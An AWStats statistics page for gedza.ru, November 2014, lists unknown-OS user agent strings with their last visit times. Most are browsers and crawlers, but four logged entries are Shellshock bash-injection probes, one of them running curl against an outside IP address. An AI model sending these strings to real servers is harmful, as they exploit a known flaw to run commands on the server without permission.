<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta name="generator" content="AWStats 7.0 (build 1.971) from config file awstats.gedza.ru.conf (http://awstats.sourceforge.net)">
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="description" content="Awstats - Advanced Web Statistics for gedza.ru (2014-11) - unknownos">
<title>Statistics for gedza.ru (2014-11) - unknownos</title>
<style type="text/css">
<!--
body { font: 11px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; margin-top: 0; margin-bottom: 0; }
.aws_bodyl  { }
.aws_border { border-collapse: collapse; background-color: #CCCCDD; padding: 1px 1px 1px 1px; margin-top: 0px; margin-bottom: 0px; }
.aws_title  { font: 13px verdana, arial, helvetica, sans-serif; font-weight: bold; background-color: #CCCCDD; text-align: center; margin-top: 0; margin-bottom: 0; padding: 1px 1px 1px 1px; color: #000000; }
.aws_blank  { font: 13px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; text-align: center; margin-bottom: 0; padding: 1px 1px 1px 1px; }
.aws_data {
	background-color: #FFFFFF;
	border-top-width: 1px;   
	border-left-width: 0px;  
	border-right-width: 0px; 
	border-bottom-width: 0px;
}
.aws_formfield { font: 13px verdana, arial, helvetica; }
.aws_button {
	font-family: arial,verdana,helvetica, sans-serif;
	font-size: 12px;
	border: 1px solid #ccd7e0;
	background-image : url(/awstatsicons/other/button.gif);
}
th		{ border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; }
th.aws	{ border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font-size: 13px; font-weight: bold; }
td		{ border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; }
td.aws	{ border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px;}
td.awsm	{ border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px; }
b { font-weight: bold; }
a { font: 11px verdana, arial, helvetica, sans-serif; }
a:link    { color: #0011BB; text-decoration: none; }
a:visited { color: #0011BB; text-decoration: none; }
a:hover   { color: #605040; text-decoration: underline; }
.currentday { font-weight: bold; }
//-->
</style>
</head>

<body style="margin-top: 0px">
<a name="top"></a>



<a name="menu">&nbsp;</a>
<form name="FormDateFilter" action="/cgi-bin/awstats.pl?config=gedza.ru&amp;output=unknownos" style="padding: 0px 0px 0px 0px; margin-top: 0">
<table class="aws_border" border="0" cellpadding="2" cellspacing="0" width="100%">
<tr><td>
<table class="aws_data sortable" border="0" cellpadding="1" cellspacing="0" width="100%">
<tr><td class="aws" valign="middle"><b>Statistics for:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 14px;">gedza.ru</span></td><td align="right" rowspan="3"><a href="http://awstats.sourceforge.net" target="awstatshome"><img src="/awstatsicons/other/awstats_logo6.png" border="0" alt='Awstats Web Site' title='Awstats Web Site' /></a></td></tr>
<tr valign="middle"><td class="aws" valign="middle" width="150"><b>Last Update:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 12px;">30 Dec 2014 - 00:01</span></td></tr>
<tr><td class="aws" valign="middle"><b>Reported period:</b></td><td class="aws" valign="middle"><span style="font-size: 14px;">Month Nov 2014</span></td></tr>
</table>
</td></tr></table>
</form>

<table>
<tr><td class="aws"><a href="javascript:parent.window.close();">Close window</a></td></tr>
</table>

<a name="unknownos">&nbsp;</a><br />
<table class="aws_border sortable" border="0" cellpadding="2" cellspacing="0" width="100%">
<tr><td class="aws_title" width="70%">Unknown OS (useragent field) </td><td class="aws_blank">&nbsp;</td></tr>
<tr><td colspan="2">
<table class="aws_data" border="1" cellpadding="2" cellspacing="0" width="100%">
<tr bgcolor="#ECECEC"><th>User agent (118)</th><th>Last visit</th></tr>
<tr><td class="aws">Mozilla/4.0_(compatible;)</td><td nowrap="nowrap">30 Nov 2014 - 23:29</td></tr>
<tr><td class="aws">WebIndex</td><td nowrap="nowrap">30 Nov 2014 - 23:19</td></tr>
<tr><td class="aws">URLGrabber</td><td nowrap="nowrap">30 Nov 2014 - 21:00</td></tr>
<tr><td class="aws">curl/7.35.0</td><td nowrap="nowrap">30 Nov 2014 - 19:10</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.35843/35.5858;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">30 Nov 2014 - 14:32</td></tr>
<tr><td class="aws">ADmantX_Platform_Semantic_Analyzer_-_ADmantX_Inc._-_www.admantx.com_-_support@admantx.com</td><td nowrap="nowrap">30 Nov 2014 - 11:23</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.40077/35.5858;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">30 Nov 2014 - 07:57</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.32193/35.5858;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">29 Nov 2014 - 20:54</td></tr>
<tr><td class="aws">Mozilla/5.0_(BB10;_Touch)_AppleWebKit/537.35__(KHTML,_like_Gecko)_Version/10.2.1.3442_Mobile_Safari/537.35_</td><td nowrap="nowrap">29 Nov 2014 - 19:48</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.33361/35.5858;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">29 Nov 2014 - 16:45</td></tr>
<tr><td class="aws">Mozilla/4.0_(compatible;_Blog_Search;)</td><td nowrap="nowrap">29 Nov 2014 - 10:11</td></tr>
<tr><td class="aws">Mozilla/5.0_(compatible;_Add_Catalog/2.1;)</td><td nowrap="nowrap">28 Nov 2014 - 23:52</td></tr>
<tr><td class="aws">Mozilla/5.0_(compatible;_vkShare;__http://vk.com/dev/Share)</td><td nowrap="nowrap">28 Nov 2014 - 23:48</td></tr>
<tr><td class="aws">Opera/9.80_(iPhone;_Opera_Mini/9.0.0/35.5691;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">28 Nov 2014 - 23:06</td></tr>
<tr><td class="aws">Mozilla/4.0</td><td nowrap="nowrap">28 Nov 2014 - 18:46</td></tr>
<tr><td class="aws">Go_1.1_package_http</td><td nowrap="nowrap">28 Nov 2014 - 16:05</td></tr>
<tr><td class="aws">Mozilla/5.0_(Android;_Mobile;_rv:33.0)_Gecko/33.0_Firefox/33.0</td><td nowrap="nowrap">28 Nov 2014 - 15:01</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.31658/35.5858;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">28 Nov 2014 - 11:44</td></tr>
<tr><td class="aws">Mozilla/3.0_(compatible;_Indy_Library)</td><td nowrap="nowrap">27 Nov 2014 - 18:28</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.40077/35.5824;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">27 Nov 2014 - 17:45</td></tr>
<tr><td class="aws">Opera/9.80_(Series_60;_Opera_Mini/7.1.32444/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">27 Nov 2014 - 15:59</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.35843/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">27 Nov 2014 - 13:34</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.33361/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">26 Nov 2014 - 20:12</td></tr>
<tr><td class="aws">Riddler_(http://riddler.io/about)</td><td nowrap="nowrap">26 Nov 2014 - 17:51</td></tr>
<tr><td class="aws">Symfony2_BrowserKit</td><td nowrap="nowrap">26 Nov 2014 - 16:41</td></tr>
<tr><td class="aws">()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H;/bin/uname_-a;echo_@</td><td nowrap="nowrap">26 Nov 2014 - 00:58</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.32193/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">25 Nov 2014 - 16:34</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.40077/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">25 Nov 2014 - 16:02</td></tr>
<tr><td class="aws">Mozilla/5.0</td><td nowrap="nowrap">25 Nov 2014 - 14:29</td></tr>
<tr><td class="aws">Xenu_Link_Sleuth/1.3.8</td><td nowrap="nowrap">25 Nov 2014 - 00:37</td></tr>
<tr><td class="aws">curl/7.29.0</td><td nowrap="nowrap">24 Nov 2014 - 22:12</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.40077/35.5691;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">24 Nov 2014 - 21:19</td></tr>
<tr><td class="aws">Opera/9.80_(iPhone;_Opera_Mini/7.0.5/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">24 Nov 2014 - 17:26</td></tr>
<tr><td class="aws">()_{_:;};_/bin/bash_-c_'curl_http://176.102.38.73/search/e.php?h=gedza.ru/'</td><td nowrap="nowrap">24 Nov 2014 - 16:07</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.0.24556/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">24 Nov 2014 - 15:33</td></tr>
<tr><td class="aws">Opera/9.80_(Series_60;_Opera_Mini/7.1.32449/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">24 Nov 2014 - 12:40</td></tr>
<tr><td class="aws">Mozilla/5.0_(Android;_Tablet;_rv:33.0)_Gecko/33.0_Firefox/33.0</td><td nowrap="nowrap">24 Nov 2014 - 05:41</td></tr>
<tr><td class="aws">Shareaza_v1.x.x.xx</td><td nowrap="nowrap">24 Nov 2014 - 01:41</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.1.25577/28.2766;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">23 Nov 2014 - 23:39</td></tr>
<tr><td class="aws">Mozilla/5.0_(Series30Plus;_Nokia225/10.01.11;_Profile/Series30Plus_Configuration/Series30Plus)_Gecko/20100401_S40OviBrowser/3.8.1.1.3003</td><td nowrap="nowrap">23 Nov 2014 - 14:15</td></tr>
<tr><td class="aws">Mozilla/5.0_(BB10;_Touch)_AppleWebKit/537.10__(KHTML,_like_Gecko)_Version/10.0.10.672_Mobile_Safari/537.10_</td><td nowrap="nowrap">23 Nov 2014 - 13:29</td></tr>
<tr><td class="aws">()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H;_/bin/uname_-a</td><td nowrap="nowrap">23 Nov 2014 - 09:37</td></tr>
<tr><td class="aws">Mozilla</td><td nowrap="nowrap">23 Nov 2014 - 04:52</td></tr>
<tr><td class="aws">Opera/9.80_(Series_60;_Opera_Mini/7.0.30697/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">22 Nov 2014 - 19:38</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/25.0.1619/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">22 Nov 2014 - 15:19</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.0.29733/35.5706;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">22 Nov 2014 - 14:40</td></tr>
<tr><td class="aws">AndroidDownloadManager</td><td nowrap="nowrap">21 Nov 2014 - 18:45</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.35843/35.5691;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">21 Nov 2014 - 13:08</td></tr>
<tr><td class="aws">PycURL/7.22.0</td><td nowrap="nowrap">20 Nov 2014 - 04:12</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.0.29733/35.5561;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">20 Nov 2014 - 01:08</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.35843/35.5561;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">20 Nov 2014 - 01:03</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.40077/35.5561;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">19 Nov 2014 - 23:47</td></tr>
<tr><td class="aws">Mozilla/5.0_(compatible;_SiteExplorer/1.0b;__http://siteexplorer.info/)</td><td nowrap="nowrap">19 Nov 2014 - 20:42</td></tr>
<tr><td class="aws">Opera/9.80_(iPhone;_Opera_Mini/7.0.5/35.5561;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">19 Nov 2014 - 09:27</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.32199/35.5561;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">18 Nov 2014 - 19:24</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.5.29194/35.5561;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">17 Nov 2014 - 17:42</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.35843/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">17 Nov 2014 - 12:00</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.1.25375/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">17 Nov 2014 - 10:31</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.5.29194/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">17 Nov 2014 - 01:27</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/21.0.1437/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">16 Nov 2014 - 17:01</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.32193/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">16 Nov 2014 - 12:00</td></tr>
<tr><td class="aws">Opera/9.80_(iPhone;_Opera_Mini/7.0.5/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">16 Nov 2014 - 11:59</td></tr>
<tr><td class="aws">Opera/9.80_(Series_60;_Opera_Mini/6.1.26266/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">15 Nov 2014 - 21:07</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.0.29952/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">15 Nov 2014 - 19:09</td></tr>
<tr><td class="aws">Opera/9.80_(iPhone;_Opera_Mini/9.0.0/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">15 Nov 2014 - 14:22</td></tr>
<tr><td class="aws">M</td><td nowrap="nowrap">15 Nov 2014 - 06:22</td></tr>
<tr><td class="aws">WhatWeb/0.4.8-dev</td><td nowrap="nowrap">15 Nov 2014 - 00:32</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.0.29733/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">15 Nov 2014 - 00:08</td></tr>
<tr><td class="aws">Opera/9.80_(Series_60;_Opera_Mini/6.5.27309/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">14 Nov 2014 - 23:38</td></tr>
<tr><td class="aws">Opera/9.80_(Series_60;_Opera_Mini/7.1.32448/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">14 Nov 2014 - 23:38</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.35613/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">14 Nov 2014 - 20:33</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.35199/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">14 Nov 2014 - 20:08</td></tr>
<tr><td class="aws">visionutils/0.2</td><td nowrap="nowrap">14 Nov 2014 - 11:21</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.33361/35.5504;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">13 Nov 2014 - 19:58</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.32193/36.1182;_U;_ru)_Presto/2.12.423_Version/11.10</td><td nowrap="nowrap">13 Nov 2014 - 17:15</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.32193/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">13 Nov 2014 - 15:54</td></tr>
<tr><td class="aws">Mozilla/5.0_(Series40;_Nokia309/05.85;_Profile/MIDP-2.1_Configuration/CLDC-1.1)_Gecko/20100401_S40OviBrowser/5.5.0.0.27</td><td nowrap="nowrap">13 Nov 2014 - 01:07</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.35843/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">11 Nov 2014 - 22:09</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.33361/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">11 Nov 2014 - 21:22</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.5.27049/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">11 Nov 2014 - 19:49</td></tr>
<tr><td class="aws">MetaURI_API/2.0__metauri.com</td><td nowrap="nowrap">11 Nov 2014 - 11:44</td></tr>
<tr><td class="aws">Mozilla/5.0_(Digg/1.0;_support@digg.com)</td><td nowrap="nowrap">11 Nov 2014 - 10:58</td></tr>
<tr><td class="aws">Mozilla/5.0_()</td><td nowrap="nowrap">11 Nov 2014 - 10:52</td></tr>
<tr><td class="aws">InAGist_URL_Resolver_(http://inagist.com)</td><td nowrap="nowrap">11 Nov 2014 - 10:50</td></tr>
<tr><td class="aws">Mozilla/5.0_(Android;_Tablet;_rv:23.0)_Gecko/23.0_Firefox/23.0</td><td nowrap="nowrap">10 Nov 2014 - 18:07</td></tr>
<tr><td class="aws">Opera/9.80_(iPhone;_Opera_Mini/7.0.5/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">09 Nov 2014 - 16:24</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.35613/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">09 Nov 2014 - 16:17</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.35199/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">09 Nov 2014 - 15:02</td></tr>
<tr><td class="aws">Opera/9.80_(iPhone;_Opera_Mini/9.0.0/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">09 Nov 2014 - 14:32</td></tr>
<tr><td class="aws">Icarus6j_-_(contact:_phil@icarus6.com)</td><td nowrap="nowrap">09 Nov 2014 - 00:53</td></tr>
<tr><td class="aws">Opera/9.80_(Series_60;_Opera_Mini/7.1.32448/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">08 Nov 2014 - 23:00</td></tr>
<tr><td class="aws">Mozilla/5.0_(Android;_Tablet;_rv:10.0.4)_Gecko/10.0.4_Firefox/10.0.4_Fennec/10.0.4</td><td nowrap="nowrap">08 Nov 2014 - 19:20</td></tr>
<tr><td class="aws">()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H;</td><td nowrap="nowrap">08 Nov 2014 - 17:24</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.5.29194/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">08 Nov 2014 - 16:35</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.0.29530/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">08 Nov 2014 - 13:32</td></tr>
<tr><td class="aws">Mozilla/5.0_(Android;_Mobile;_rv:30.0)_Gecko/30.0_Firefox/30.0</td><td nowrap="nowrap">07 Nov 2014 - 22:42</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.35114/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">07 Nov 2014 - 18:32</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.1.25375/35.5390;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">07 Nov 2014 - 02:00</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.0.29952/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">06 Nov 2014 - 16:09</td></tr>
<tr><td class="aws">Mozilla/5.0_(Android;_Mobile;_rv:32.0)_Gecko/32.0_Firefox/32.0</td><td nowrap="nowrap">06 Nov 2014 - 13:05</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.6.35843/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">06 Nov 2014 - 12:43</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.1.25655/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">06 Nov 2014 - 02:50</td></tr>
<tr><td class="aws">Opera/9.80_(Series_60;_Opera_Mini/7.0.32404/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">05 Nov 2014 - 21:05</td></tr>
<tr><td class="aws">Opera/9.80_(iPad;_Opera_Mini/7.0.2/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">05 Nov 2014 - 20:19</td></tr>
<tr><td class="aws">Opera/9.80_(iPhone;_Opera_Mini/7.0.5/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">05 Nov 2014 - 19:00</td></tr>
<tr><td class="aws">Mozilla/5.0_(PlayBook;_U;_RIM_Tablet_OS_2.0.1;_en-US)_AppleWebKit/535.8__(KHTML,_like_Gecko)_Version/7.2.0.1_Safari/535.8_</td><td nowrap="nowrap">05 Nov 2014 - 12:03</td></tr>
<tr><td class="aws">Riddler_(http://riddler.io/about.html)</td><td nowrap="nowrap">05 Nov 2014 - 09:22</td></tr>
<tr><td class="aws">2ip.ru_CMS_Detector_(http://2ip.ru/cms/)</td><td nowrap="nowrap">05 Nov 2014 - 01:29</td></tr>
<tr><td class="aws">Opera/9.80_(iPhone;_Opera_Mini/8.0.5/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">04 Nov 2014 - 22:41</td></tr>
<tr><td class="aws">Mozilla/5.0_(SAMSUNG;_SAMSUNG-GT-S5250/S525WXEKJ1;_U;_Bada/1.0;_ru-ru)_AppleWebKit/533.1_(KHTML,_like_Gecko)_Dolfin/2.0_Mobile_WQVGA_SMM-MMS/1.2.0_NexPlayer/3.0_profile/MIDP-2.1_configuration/CLDC-1.1_OPN-B</td><td nowrap="nowrap">04 Nov 2014 - 20:55</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/7.5.35199/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">04 Nov 2014 - 14:37</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/25.0.1619/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">03 Nov 2014 - 22:09</td></tr>
<tr><td class="aws">Opera/9.80_(Android;_Opera_Mini/6.5.29194/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">03 Nov 2014 - 18:38</td></tr>
<tr><td class="aws">Opera/9.80_(iPad;_Opera_Mini/7.0.5/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">03 Nov 2014 - 18:36</td></tr>
<tr><td class="aws">Opera/9.80_(SpreadTrum;_Opera_Mini/4.4.32739/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">03 Nov 2014 - 02:00</td></tr>
<tr><td class="aws">Mozilla/5.0_(compatible;_CsQuery/1.3)</td><td nowrap="nowrap">02 Nov 2014 - 22:24</td></tr>
<tr><td class="aws">Mozilla/5.0_(Series40;_Nokia302/14.26;_Profile/MIDP-2.1_Configuration/CLDC-1.1)_Gecko/20100401_S40OviBrowser/4.0.0.0.45</td><td nowrap="nowrap">02 Nov 2014 - 21:08</td></tr>
<tr><td class="aws">Opera/9.80_(Series_60;_Opera_Mini/7.1.32448/35.5247;_U;_ru)_Presto/2.8.119_Version/11.10</td><td nowrap="nowrap">02 Nov 2014 - 18:24</td></tr>
</table></td></tr></table><br />

<br /><br />
<span dir="ltr" style="font: 11px verdana, arial, helvetica; color: #000000;"><b>Advanced Web Statistics 7.0 (build 1.971)</b> - <a href="http://awstats.sourceforge.net" target="awstatshome">Created by awstats</a></span><br />

<br />
</body>
</html>
